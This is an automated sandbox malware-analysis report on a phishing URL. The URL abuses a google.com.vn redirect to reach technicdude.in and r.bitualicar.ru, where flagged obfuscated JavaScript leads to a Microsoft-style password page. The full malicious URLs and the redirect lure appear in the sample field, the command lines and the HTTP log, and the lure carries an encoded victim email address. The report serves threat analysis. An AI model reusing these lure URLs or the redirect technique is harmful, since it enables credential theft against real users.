Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=x

Overview

General Information

Sample URL:https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&c
Analysis ID:1592211
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 6852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1908,i,13844692018575917634,11113363890473610218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://r.bitualicar.ru/2Q5WxE/Avira URL Cloud: Label: malware
Source: https://technicdude.in/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY2... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of credential theft or other nefarious activities.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY2... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. The use of obfuscated URLs, redirection to untrusted domains, and the collection of user data via form submission are all strong indicators of malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY2... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script attempts to redirect the user to a suspicious domain ('Hpnj.bitualicaru/2Q5WxE/') and collects user data via XHR requests. Additionally, the script includes measures to detect and block common security tools, further indicating malicious intent. Overall, this script demonstrates a high level of risk and should be treated as potentially malicious.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 0567d2ad-b9b5-46d9-a722-b6ee991f55153bf0d61d-70ab-4bb4-9e11-29b98e283cda
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.8:49726 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.8:61306 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com.vn to http://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/znjlzc5uzxdjb21ay29sb25pywxjagvtlmnvbq==
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1Host: google.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
